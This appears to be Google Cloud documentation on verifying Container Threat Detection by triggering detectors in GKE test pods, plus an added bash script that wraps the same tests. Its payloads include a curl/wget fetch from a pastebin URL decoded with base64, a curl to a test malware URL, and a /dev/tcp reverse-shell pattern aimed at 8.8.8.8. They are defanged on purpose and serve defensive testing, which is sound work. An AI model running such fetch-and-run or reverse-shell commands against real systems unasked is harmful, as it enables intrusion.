This page explains how to verify that Container Threat Detection is working by intentionally triggering detectors and checking for findings. Container Threat Detection is a built-in service for the Security Command Center Premium tier. To view Container Threat Detection findings, it must be enabled in Security Command Center Services settings.
Before you begin
To detect potential threats to your containers, you need to make sure that your clusters are on a supported version of Google Kubernetes Engine (GKE). For more information, see using a supported GKE version.
Set environment variables
To test detectors, you use the Google Cloud console and Cloud Shell. You can set environment variables in Cloud Shell to make it easier to run commands. The following variables are used to test all Container Threat Detection detectors.
Go to the Google Cloud console.
Select the project that contains the container you want to use to test.
Click Activate Cloud Shell.
In Cloud Shell, set environment variables.
The zone your cluster is in:
export ZONE=CLUSTER_ZONE
The project your container is in:
export PROJECT=PROJECT_ID
Your cluster name:
export CLUSTER_NAME=CLUSTER_NAME
The variables are set. The following sections include instructions for testing Container Threat Detection detectors.
Added Binary Executed
To trigger an Added Binary Executed finding, drop a binary in your container and execute it. This example deploys the latest Ubuntu 18.04 image, copies /bin/ls to another location, and then executes it. The binary's execution is unexpected because the copy of the binary wasn't part of the original container image, even when that image is on Ubuntu 18.04, and containers are meant to be immutable.
Use Cloud Shell to access the cluster control plane:
gcloud container clusters get-credentials $CLUSTER_NAME \
    --zone $ZONE \
    --project $PROJECT
Drop a binary and execute it:
tag="ktd-test-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
kubectl run --restart=Never --rm=true -i \
    --image marketplace.gcr.io/google/ubuntu1804:latest \
    "$tag" -- bash -c "cp /bin/ls /tmp/$tag; /tmp/$tag"
This test procedure should create an Added Binary Executed finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate Security Command Center Premium tier.
For noise reduction, when you first create a container, Container Threat Detection temporarily filters Added Binary Executed findings. To see all Added Binary Executed findings while a container is being set up, prefix your container name with ktd-test, as in the example.
Added Library Loaded
To trigger an Added Library Loaded finding, drop a library in your container and then load it. This example deploys the latest Ubuntu 18.04 image, copies /lib/x86_64-linux-gnu/libc.so.6 to another location, and then loads it using ld. The loaded library is unexpected because the copy of the library was not part of the original container image, even if that image is on Ubuntu 18.04, and containers are meant to be immutable.
Use Cloud Shell to access the cluster control plane:
gcloud container clusters get-credentials $CLUSTER_NAME \
    --zone $ZONE \
    --project $PROJECT
Drop a library and use ld to load it:
tag="ktd-test-library-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
kubectl run --restart=Never --rm=true -i \
    --image marketplace.gcr.io/google/ubuntu1804:latest \
    "$tag" -- bash -c "cp /lib/x86_64-linux-gnu/libc.so.6 /tmp/$tag; /lib64/ld-linux-x86-64.so.2 /tmp/$tag"
This test procedure should create an Added Library Loaded finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate Security Command Center Premium tier at the organization level.
For noise reduction, when you first create a container, Container Threat Detection temporarily filters Added Library Loaded findings. To see all Added Library Loaded findings while a container is being set up, prefix your container name with ktd-test, as in the example.
Malicious Script Executed
To trigger a Malicious Script Executed finding, you can execute the script in the following procedure in your container.
The procedure deploys the latest Ubuntu 18.04 image, copies a script that appears malicious, and then executes it. To trigger a detection, a script must appear malicious to the detector.
The script originated from a honeypot, but the binary at the referenced URL was removed, so running the script won't cause malicious activity in your container. If you follow the URL, you receive a 404 message, which is expected.
Use Cloud Shell to access the cluster control plane:
gcloud container clusters get-credentials $CLUSTER_NAME \
    --zone $ZONE \
    --project $PROJECT
Execute a script in a new container:
tag="ktd-test-malicious-script-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
kubectl run --restart=Never --rm=true -i \
    --image marketplace.gcr.io/google/ubuntu1804:latest "$tag" \
    -- bash -c "(curl -fsSL https://pastebin.com/raw/KGwfArMR||wget -q -O - https://pastebin.com/raw/KGwfArMR)| base64 -d"
This test procedure creates a Malicious Script Executed finding that you can view in Security Command Center and in Cloud Logging if you've configured logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate Security Command Center Premium tier at the organization level.
Malicious URL Observed
To trigger a Malicious URL Observed finding, execute a binary and provide a malicious URL as an argument.
The following example deploys an Ubuntu 18.04 image and executes /bin/curl to access a sample malware URL from the Safe Browsing service.
Use Cloud Shell to access the cluster control plane:
gcloud container clusters get-credentials $CLUSTER_NAME \
    --zone $ZONE \
    --project $PROJECT
Execute curl and provide a malicious URL as an argument:
tag="ktd-test-malicious-url-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
url="https://testsafebrowsing.appspot.com/s/malware.html"
kubectl run --restart=Never --rm=true -i \
    --image marketplace.gcr.io/google/ubuntu1804:latest \
    "$tag" -- bash -c "curl $url | cat"
This test procedure triggers a Malicious URL Observed finding that you can view in Security Command Center and, if you have configured Logging for Container Threat Detection, in Cloud Logging. Viewing findings in Cloud Logging is only available if you activate Security Command Center Premium tier at the organization level.
Reverse Shell
To trigger a Reverse Shell finding, start a binary with stdin redirection to a TCP connected socket. This example starts /bin/echo with redirection to the Google public DNS 8.8.8.8 on the DNS port. Nothing is printed when you run this example. To prevent any external code injection through a man-in-the-middle (MITM) attack, this example doesn't use the /bin/bash binary.
Use Cloud Shell to access the cluster control plane:
gcloud container clusters get-credentials $CLUSTER_NAME \
    --zone $ZONE \
    --project $PROJECT
Start a binary with /bin/echo redirection to the Google public DNS:
tag="ktd-test-reverse-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
kubectl run --restart=Never --rm=true -i \
    --image marketplace.gcr.io/google/ubuntu1804:latest \
    "$tag" -- bash -c "/bin/echo >& /dev/tcp/8.8.8.8/53 0>&1"
This test procedure creates a Reverse Shell finding you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate Security Command Center Premium tier at the organization level.
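The five procedures on this page (Added Binary Executed, Added Library Loaded, Malicious Script Executed, Malicious URL Observed and Reverse Shell) all have the same shape: fetch cluster credentials, start a throwaway pod whose name carries the ktd-test prefix, and run a one-line payload under bash -c. The following script is an added example, not Google's code and not part of the page's own procedures; it packages the five payloads exactly as given above into one driver so that each detector test can be re-run by name. It assumes that ZONE, PROJECT and CLUSTER_NAME are exported as in the "Set environment variables" step; the function names ktd_tag, ktd_payload and ktd_run are assumptions of this example, not part of the product.

```shell
#!/usr/bin/env bash
# Added example: one driver for the Container Threat Detection test cases
# described on this page. Requires gcloud and kubectl, and the ZONE, PROJECT
# and CLUSTER_NAME variables from the "Set environment variables" step.

KTD_IMAGE="marketplace.gcr.io/google/ubuntu1804:latest"

# Build the pod name. The ktd-test prefix matters: the page states that
# Container Threat Detection temporarily filters Added Binary Executed and
# Added Library Loaded findings on newly created containers unless the
# container name starts with ktd-test.
ktd_tag() {
  printf 'ktd-test-%s-%s\n' "$1" "$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
}

# Print the command that bash -c runs inside the pod for one test case.
# $1 is the case name, $2 the pod name (used as the copied file's name).
# The payloads are the ones shown on this page; an unknown case returns 1.
ktd_payload() {
  case "$1" in
    added-binary)
      printf 'cp /bin/ls /tmp/%s; /tmp/%s' "$2" "$2" ;;
    added-library)
      printf 'cp /lib/x86_64-linux-gnu/libc.so.6 /tmp/%s; /lib64/ld-linux-x86-64.so.2 /tmp/%s' "$2" "$2" ;;
    malicious-script)
      printf '(curl -fsSL https://pastebin.com/raw/KGwfArMR||wget -q -O - https://pastebin.com/raw/KGwfArMR)| base64 -d' ;;
    malicious-url)
      printf 'curl https://testsafebrowsing.appspot.com/s/malware.html | cat' ;;
    reverse-shell)
      printf '/bin/echo >& /dev/tcp/8.8.8.8/53 0>&1' ;;
    *)
      return 1 ;;
  esac
}

# Fetch cluster credentials once, then run each named test case in its own
# pod. --rm=true removes the pod when the payload finishes, so the printed
# pod name is the record of which run produced which finding.
ktd_run() {
  gcloud container clusters get-credentials "$CLUSTER_NAME" \
    --zone "$ZONE" --project "$PROJECT" || return 1
  for case_name in "$@"; do
    tag=$(ktd_tag "$case_name")
    payload=$(ktd_payload "$case_name" "$tag") || {
      echo "unknown test case: $case_name" >&2
      return 1
    }
    echo "== $case_name: pod $tag"
    kubectl run --restart=Never --rm=true -i \
      --image "$KTD_IMAGE" "$tag" -- bash -c "$payload"
  done
}

# Usage: ./ktd-tests.sh added-binary reverse-shell
# Valid names: added-binary added-library malicious-script malicious-url reverse-shell
if [ "$#" -gt 0 ]; then
  ktd_run "$@"
fi
```

Each run prints the pod name before starting it; keep that name, because the pod itself is gone once the payload exits. After the run, check Security Command Center (and Cloud Logging, if you configured Logging for Container Threat Detection) for one finding per case you ran.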
What's next
- Learn how to use Container Threat Detection.